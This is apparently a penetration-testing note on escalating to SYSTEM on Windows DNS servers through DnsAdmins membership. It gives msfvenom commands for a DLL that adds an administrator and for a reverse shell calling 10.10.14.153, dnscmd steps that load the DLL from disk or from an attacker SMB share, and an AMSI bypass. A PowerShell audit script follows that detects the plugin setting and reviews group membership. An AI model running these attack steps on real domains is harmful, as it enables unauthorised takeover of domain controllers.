DnsAdmins
Using DnsAdmins to run commands as NT AUTHORITY\SYSTEM
Members of the DnsAdmins group have administrative access to the DNS servers of the domain. The DNS service itself runs as NT AUTHORITY\SYSTEM, so control over its configuration can be used to escalate privileges on a DC, or on any other server that acts as a DNS server for the domain.
The built-in dnscmd utility can be used to set the path of the server-level plugin DLL. A custom DLL placed at that path is loaded by the DNS service (as SYSTEM) the next time the service is restarted.
Domain Controllers and DNS
- In Active Directory environments, Domain Controllers often act as DNS servers.
- DNS servers are critical to Active Directory operation and are accessible to most domain users.
- Microsoft implemented a custom DNS management protocol over Remote Procedure Call (RPC) for managing DNS.
The combination of the DNS protocol and the custom management protocol introduces a significant attack surface on Domain Controllers.
How to exploit
Generate a malicious DLL to execute commands
# Add user to group
msfvenom -p windows/x64/exec cmd='net group "Administrators" ryan /add' -f dll -o adduser.dll
# Reverse shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.153 LPORT=443 -f dll -o reverse.dll
Load the custom DLL
dnscmd.exe /config /serverlevelplugindll C:\Users\public\reverse.dll
From target run
# From evil-winrm
Bypass-4MSI
dnscmd.exe /config /serverlevelplugindll 'C:\users\ryan\reverse.dll'
# Using smb server
impacket-smbserver share -smb2support .
dnscmd localhost /config /serverlevelplugindll \\10.10.14.153\share\reverse.dll
Finally, stop and start the DNS service again so that the DLL is loaded.
sc.exe stop dns
sc.exe start dns
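From the defender's side, the same setting is what gives the technique away: dnscmd /config /serverlevelplugindll writes the ServerLevelPluginDll value under the DNS service's Parameters key, and that value should normally be absent. The following PowerShell is an added audit script, not part of the original notes; it assumes it runs elevated on a Windows DNS server or DC and, for the group audit, that the ActiveDirectory module is installed.

```powershell
# Added defensive check, not part of the original notes. Assumes an elevated session on a
# Windows DNS server / DC; Get-DnsAdminsMembership also assumes the ActiveDirectory module.
# The registry value below is the one dnscmd /config /serverlevelplugindll sets.
$ParamsKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters'
$ValueName = 'ServerLevelPluginDll'

function Get-DnsServerPluginDllFinding {
    # Read the configured plugin path; an absent or empty value is the expected baseline.
    $props  = Get-ItemProperty -Path $ParamsKey -Name $ValueName -ErrorAction SilentlyContinue
    $plugin = $props.$ValueName
    if ([string]::IsNullOrWhiteSpace($plugin)) { return $null }

    $finding = [ordered]@{
        PluginDll = $plugin
        IsUncPath = $plugin.StartsWith('\\')      # DLL served from a remote share: highly suspicious
        Exists    = Test-Path -LiteralPath $plugin
        Signature = 'NotChecked'
        Signer    = $null
    }
    if ($finding.Exists) {
        # Authenticode status (Valid / NotSigned / HashMismatch ...) and the signer subject
        $sig = Get-AuthenticodeSignature -FilePath $plugin
        $finding.Signature = $sig.Status.ToString()
        $finding.Signer    = $sig.SignerCertificate.Subject
    }
    [pscustomobject]$finding
}

function Get-DnsAdminsMembership {
    # Recursive so that nested groups cannot hide an unexpected member.
    Get-ADGroupMember -Identity 'DnsAdmins' -Recursive |
        Select-Object Name, objectClass, distinguishedName
}

function Clear-DnsServerPluginDll {
    # Remediation: remove the value, then restart DNS so the running service drops the DLL.
    # Preserve a copy of the DLL and the DNS Server event log for the investigation first.
    Remove-ItemProperty -Path $ParamsKey -Name $ValueName -ErrorAction Stop
    Restart-Service -Name DNS
}

$finding = Get-DnsServerPluginDllFinding
if ($null -eq $finding) {
    Write-Host 'ServerLevelPluginDll is not set (expected baseline).'
} else {
    Write-Warning 'ServerLevelPluginDll is configured on this DNS server:'
    $finding | Format-List
}
Get-DnsAdminsMembership | Format-Table -AutoSize
```

Running the first two functions on a schedule and alerting on any non-empty plugin path, or on any change to DnsAdmins membership, covers both the escalation itself and the group access it depends on.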